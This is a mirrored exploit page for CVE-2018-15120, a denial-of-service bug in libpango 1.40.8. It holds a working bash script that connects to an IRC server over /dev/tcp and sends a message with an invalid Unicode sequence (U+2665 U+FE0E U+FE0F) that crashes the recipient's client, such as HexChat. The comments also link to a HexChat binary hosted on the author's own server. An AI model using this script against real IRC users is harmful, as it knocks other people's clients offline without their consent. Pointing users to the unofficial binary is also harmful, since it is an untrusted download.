首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Libpango 1.40.8 - Denial of Service (PoC)
来源:vfocus.net 作者:JefferyM 发布时间:2018-08-28  
# Exploit Title: Libpango 1.40.8 - Denial of Service (PoC)
# Date: 2018-08-06
# Exploit Author: Jeffery M
# Vendor Homepage: https://www.pango.org/
# Software Link: http://ftp.gnome.org/pub/GNOME/sources/pango/1.40/pango-1.40.9.tar.xz
# Version: 1.40.8+
# Tested on: Windows 7, Gentoo
# CVE : CVE-2018-15120
 
# Patch : https://github.com/GNOME/pango/commit/71aaeaf020340412b8d012fe23a556c0420eda5f
 
# Description:
# Invalid Unicode sequences, such as 0x2665 0xfe0e 0xfe0f, can trick the
# Emoji iter code into returning an empty segment, which then triggers
# an assertion in the itemizer.
 
# POC:
# Save the below as irc_com_dump; chmod +x irc_com_dump;connect to an
# irc server with something linked against libpango 1.40.8 or higher
# (e.g. hexchat 2.14.1 [ can be obtained on my server
# http://order.a.whore.website/HexChat%202.14.1%20x86.exe ), then run
# the following:
 
irc_com_dump $'privmsg someuser :\u2665\uFE0E\uFE0F'
 
This is a rudimentary example of how this attack can be used.
 
#!/bin/bash
# Name: irc_com_dump
# Save this script as irc_com_dump
# run as follows on irc.laks.ml or a server of your choice
# irc_com_dump $'privmsg someuser :\u2665\uFE0E\uFE0F'
# When the user receives the message it will trigger the assertion fail.
###
helpfunc ()
{
sed  -nre '/sed/d;/bash/,/###/{1d;s/^# //g;s/###//;p}' $0;
 
}
if [[ $# -lt 1 ]] || [[ $1 =~ ^-?-h ]] ; then
helpfunc && exit 1
fi
 
 
# So we can send unicode without having to do shit.
LC_ALL=en_US.utf8
export LC_ALL
 
 
export allargs=("$@")
#test_ping ()
#{
#        if [[ ! -n $PING ]]; then
#       export PING="$(echo $h| awk '/PING/{print "PONG "$2}')";
#       fi;
#}
if [[ -n ${DEBUG} ]] ; then
declare -p allargs
fi
 
export name=magicrun${RANDOM}
if [[ -n ${NORANDOM} ]] ; then
        export name=magicdebug
fi
run_irc_com ()
{
set -vx
    echo ${allargs[1]}
#    if  ( ( ( [[ ! ${allargs[1]} =~ [a-zA-Z].* ]] || true) && ( [[
${allargs[1]} =~ [0-9].*[0-9] ]] &&  [[ ! ${allargs[0]}  =~ .*[.].*
]] || true) ) )     ; then
if [[ ! ${allargs[0]}  =~ .*[.].* &&  ${allargs[1]} =~ ^[0-9]+[0-9]?$
&& ! ${allargs[1]} =~ .*[a-zA-Z].* || $# -eq 1 ]] ; then
    export COMM="$@";
    else
    export s=$1
    export p=$2
    export COMM="${@:3}"
        if [[ $p =~ .*[a-zA-Z] ]] ; then
                unset s p
                export COMM="${allargs[@]}"
        fi
    fi
 
    test -z $s||false  && exec 5<> /dev/tcp/irc.laks.ml/6667 || test
-n $s && echo s is $s;exec 5<>/dev/tcp/$s/$p
set +vx
    echo -e 'USER '${name}' 8 ''*'' :'${name}'\nNICK '${name}'\n' 1>&5
2>&1 | stdbuf -i0 -o0 cat - 0<&5 > /dev/stdout | while read h; do
        if [[ ! -n $PING ]]; then
            export PING="$(echo $h| awk '/PING/{print "PONG "$2}')";
        fi;
##      test_ping;
echo -e "${PING}\n" 1>&5
        if [[ ! -n $PINGSENT ]] && [[ -n $PING ]] ; then
            export PINGSENT=isentmyping;
        fi;
        if [[ -z $COMMSENT ]] && [[ -n $PINGSENT ]] && [[ -n $PING ]] ; then
echo -e "${COMM}\nQUIT\n" 1>&5 2>&1
fi
        echo "$h" 2>&1;
    done
 
}
 
run_irc_com ${allargs[@]} |& sed -ne "/:$name MODE $name
:+iwx/,/\x04/p" | sed -e "/:$name MODE $name/d" -e '/^ERROR
:Closing/d' | awk -F" $name " '{print $2}'
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Trend Micro Enterprise Mobile
·Node.JS - 'node-serialize' Rem
·Apache Struts 2.3 < 2.3.34 / 2
·LiteCart 2.1.2 - Arbitrary Fil
·Apache Struts 2.3 < 2.3.34 / 2
·HP Jetdirect - Path Traversal
·CuteFTP 5.0 - Buffer Overflow
·Cisco Network Assistant 6.3.3
·Firefox 55.0.3 - Denial of Ser
·Instagram App 41.1788.50991.0
·Foxit PDF Reader 9.0.1.1049 Po
·Textpad 8.1.2 Denial Of Servic
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved